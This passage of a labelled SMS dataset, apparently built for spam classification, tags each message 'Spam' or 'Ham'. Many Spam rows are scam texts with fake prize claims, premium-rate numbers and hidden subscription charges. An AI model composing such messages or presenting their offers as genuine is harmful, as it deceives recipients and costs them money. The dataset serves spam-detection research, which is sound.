449 | Spam Refused a loan? Secured or Unsecured? Can't get credit? Call free now 0800 195 6669 or text back 'help' & we will!
450 | Spam Last Chance! Claim ur £150 worth of discount vouchers today! Text SHOP to 85023 now! SavaMob, offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Sub. 16
451 | Ham Goodmorning today i am late for <DECIMAL> min.
452 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
453 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm
454 | Spam HMV BONUS SPECIAL 500 pounds of genuine HMV vouchers to be won. Just answer 4 easy questions. Play Now! Send HMV to 86688 More info:www.100percent-real.com
455 | Spam Natalja (25/F) is inviting you to be her friend. Reply YES-440 or NO-440 See her: www.SMS.ac/u/nat27081980 STOP? Send STOP FRND to 62468
456 | Spam This is the 2nd attempt to contract U, you have won this weeks top prize of either £1000 cash or £200 prize. Just call 09066361921
457 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
458 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09061744553 now! videochat wid ur mates, play java games, Dload polyH music, noline rentl. bx420. ip4. 5we. 150pm
459 | Ham "Edison has rightly said, ""A fool can ask more questions than a wise man can answer"" Now you know why all of us are speechless during ViVa.. GM,GN,GE,GNT:-)"
460 | Ham This pen thing is beyond a joke. Wont a Biro do? Don't do a masters as can't do this ever again!
461 | Spam You are awarded a SiPix Digital Camera! call 09061221061 from landline. Delivery within 28days. T Cs Box177. M221BP. 2yr warranty. 150ppm. 16 . p p£3.99
462 | Ham Hey u still at the gym?
463 | Spam 44 7732584351, Do you want a New Nokia 3510i colour phone DeliveredTomorrow? With 300 free minutes to any mobile + 100 free texts + Free Camcorder reply or call 08000930705.
464 | Ham My friend, she's studying at warwick, we've planned to go shopping and to concert tmw, but it may be canceled, havn't seen for ages, yeah we should get together sometime!
465 | Ham BABE !!! I miiiiiiissssssssss you ! I need you !!! I crave you !!! :-( ... Geeee ... I'm so sad without you babe ... I love you ...
466 | Ham Aiyo... U always c our ex one... I dunno abt mei, she haven reply... First time u reply so fast... Y so lucky not workin huh, got bao by ur sugardad ah...gee..
467 | Spam FreeMsg: Claim ur 250 SMS messages-Text OK to 84025 now!Use web2mobile 2 ur mates etc. Join Txt250.com for 1.50p/wk. T&C BOX139, LA32WU. 16 . Remove txtX or stop
468 | Ham Joy's father is John. Then John is the ____ of Joy's father. If u ans ths you hav <#> IQ. Tis s IAS question try to answer.
469 | Ham I get out of class in bsn in like <#> minutes, you know where advising is?
470 | Spam accordingly. I repeat, just text the word ok on your mobile phone and send
471 | Spam CALL 09090900040 & LISTEN TO EXTREME DIRTY LIVE CHAT GOING ON IN THE OFFICE RIGHT NOW TOTAL PRIVACY NO ONE KNOWS YOUR [sic] LISTENING 60P MIN 24/7MP 0870753331018+
472 | Spam WIN a year supply of CDs 4 a store of ur choice worth £500 & enter our £100 Weekly draw txt MUSIC to 87066 Ts&Cs www.Ldew.com.subs16+1win150ppmx3
473 | Spam FreeMsg Hey there darling it's been 3 week's now and no word back! I'd like some fun you up for it still? Tb ok! XxX std chgs to send, £1.50 to rcv
474 | Spam Hard LIVE 121 chat just 60p/min. Choose your girl and connect LIVE. Call 09094646899 now! Cheap Chat UK's biggest live service. VU BCM1896WC1N3XX
475 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize!
476 | Spam You won't believe it but it's true. It's Incredible Txts! Reply G now to learn truly amazing things that will blow your mind. From O2FWD only 18p/txt
477 | Spam Someonone you know is trying to contact you via our dating service! To find out who it could be call from your mobile or landline 09064015307 BOX334SK38ch
478 | Ham Hey... Thk we juz go accordin to wat we discussed yest lor, except no kb on sun... Cos there's nt much lesson to go if we attend kb on sat...
479 | Ham Aight, I'll text you when I'm back
480 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16
481 | Ham Or I guess <#> min
482 | Ham Awesome, I remember the last time we got somebody high for the first time with diesel :V
483 | Spam Ur cash-balance is currently 500 pounds - to maximize ur cash-in now send GO to 86688 only 150p/meg. CC: 08718720201 HG/Suite342/2lands Row/W1j6HL
484 | Ham Hi ....My engagement has been fixd on <#> th of next month. I know its really shocking bt....hmm njan vilikkam....t ws al of a sudn;-(.
485 | Ham What's up my own oga. Left my phone at home and just saw ur messages. Hope you are good. Have a great weekend.
486 | Ham Alright. I'm out--have a good night!
487 | Spam "For your chance to WIN a FREE Bluetooth Headset then simply reply back with ""ADP"""
488 | Spam Free 1st week entry 2 TEXTPOD 4 a chance 2 win 40GB iPod or £250 cash every wk. Txt POD to 84128 Ts&Cs www.textpod.net custcare 08712405020.
489 | Spam Todays Voda numbers ending with 7634 are selected to receive a £350 reward. If you have a match please call 08712300220 quoting claim code 7684 standard rates apply.
490 | Ham Just got to <#>
491 | Ham Oh...i asked for fun. Haha...take care. ü
492 | Spam "You can stop further club tones by replying ""STOP MIX"" See my-tone.com/enjoy. html for terms. Club tones cost GBP4.50/week. MFL, PO Box 1146 MK45 2WT (2/3)"
493 | Ham We have pizza if u want
494 | Ham Tee hee. Off to lecture, cheery bye bye.
495 | Spam We tried to contact you re our offer of New Video Phone 750 anytime any network mins HALF PRICE Rental camcorder call 08000930705 or reply for delivery Wed
496 | Spam Someone has contacted our dating service and entered your phone because they fancy you! To find out who it is call from a landline 09111032124 . PoBox12n146tf150p
497 | Ham Good afternoon, my love. It was good to see your words on YM and get your tm. Very smart move, my slave ... *smiles* ... I drink my coffee and await you.
498 | Spam SMS AUCTION You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+
499 | Spam 2p per min to call Germany 08448350055 from your BT line. Just 2p per min. Check PlanetTalkInstant.com for info & T's & C's. Text stop to opt out
500 | Ham Yup. Izzit still raining heavily cos i'm in e mrt i can't c outside.
501 | Ham Are you this much buzy
502 | Spam UR GOING 2 BAHAMAS! CallFREEFONE 08081560665 and speak to a live operator to claim either Bahamas cruise of£2000 CASH 18+only. To opt out txt X to 07786200117
503 | Spam it to 80488. Your 500 free text messages are valid until 31 December 2005.
504 | Ham Goodmorning, today i am late for <DECIMAL> min.
505 | Ham Pls send me a comprehensive mail about who i'm paying, when and how much.
506 | Ham Heart is empty without love.. Mind is empty without wisdom.. Eyes r empty without dreams & Life is empty without frnds.. So Alwys Be In Touch. Good night & sweet dreams
507 | Spam U are subscribed to the best Mobile Content Service in the UK for £3 per ten days until you send STOP to 83435. Helpline 08706091795.
508 | Spam Congratulations U can claim 2 VIP row A Tickets 2 C Blu in concert in November or Blu gift guaranteed Call 09061104276 to claim TS&Cs www.smsco.net cost£3.75max
509 | Ham I had a good time too. Its nice to do something a bit different with my weekends for a change. See ya soon
510 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222.
511 | Ham I wnt to buy a BMW car urgently..its vry urgent.but hv a shortage of <#> Lacs.there is no source to arng dis amt. <#> lacs..thats my prob
512 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+
513 | Spam Promotion Number: 8714714 - UR awarded a City Break and could WIN a £200 Summer Shopping spree every WK. Txt STORE to 88039 . SkilGme. TsCs087147403231Winawk!Age16 £1.50perWKsub
514 |
--------------------------------------------------------------------------------